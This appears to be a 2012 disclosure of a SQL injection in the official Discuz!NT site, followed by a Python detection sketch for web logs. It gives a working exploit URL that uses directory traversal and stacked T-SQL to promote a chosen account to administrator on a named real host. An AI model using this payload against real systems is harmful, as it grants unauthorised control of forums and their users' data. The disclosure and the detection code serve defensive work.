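Vulnerability author: Jannock
Submitted: 2012-02-13
Published: 2012-02-18
Vulnerability type: SQL injection
Brief description:
The official DNT website has a SQL injection vulnerability (Powered by Discuz!NT 3.9.913 Beta).
Details: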
I was originally testing Vancl (), but found that the official site is affected as well.
Injection point:
http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1
Exploitation:
http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27xxxxx%27%27%27%29–
The shell has already been removed.
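For defenders reviewing web server logs, the request above has two separable signals: an AjaxTemplate value that climbs out of its directory into an admin user control, and a poster value carrying SQL metacharacters and stacked T-SQL keywords. The following detection sketch is an added example, not code from the original report or from Discuz!NT; the finding labels, the `forum.example` host and the sample requests are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Endpoint and parameter names are taken from the request shown on this page.
ENDPOINT = "/space/manage/ajax.aspx"
SQL_META = re.compile(r"'|;|--")
SQL_WORDS = re.compile(r"\b(declare|exec|select|update|sysobjects)\b", re.I)

def query_params(query):
    """Split on '&' only, so a literal ';' stays inside the value it belongs to."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key).lower(), []).append(unquote_plus(value))
    return params

def inspect_request(url):
    """Return a list of finding labels for one request URL; empty means clean."""
    parts = urlsplit(url)
    # IIS paths are case-insensitive; endswith also covers sub-directory installs.
    if not parts.path.lower().endswith(ENDPOINT):
        return []
    params = query_params(parts.query)
    findings = []
    for template in params.get("ajaxtemplate", []):
        normalized = template.replace("\\", "/").lower()
        if "../" in normalized:
            findings.append("template-traversal")
        if "/admin/" in normalized:
            findings.append("template-admin-control")
    for poster in params.get("poster", []):
        if SQL_META.search(poster):
            findings.append("poster-sql-metachar")
        if SQL_WORDS.search(poster):
            findings.append("poster-sql-keyword")
    return findings

# Constructed sample requests (placeholder host, not real log data).
BASE = "http://forum.example/space/manage/ajax.aspx?AjaxTemplate="
SAMPLES = [
    BASE + "ajaxtopicinfo.ascx&poster=1",
    BASE + "../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1",
    BASE + "..%2F..%2Fadmin/usercontrols/ajaxtopicinfo.ascx"
         + "&poster=1%27%29;declare%20@t%20nvarchar%2840%29--",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(inspect_request(url), url)
```

The traversal finding alone is worth alerting on, since it fires before any SQL reaches the database; values are percent-decoded once, so double-encoded input needs an extra decoding pass.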
Proof of vulnerability:
Tags: SQL injection, vulnerability, Discuz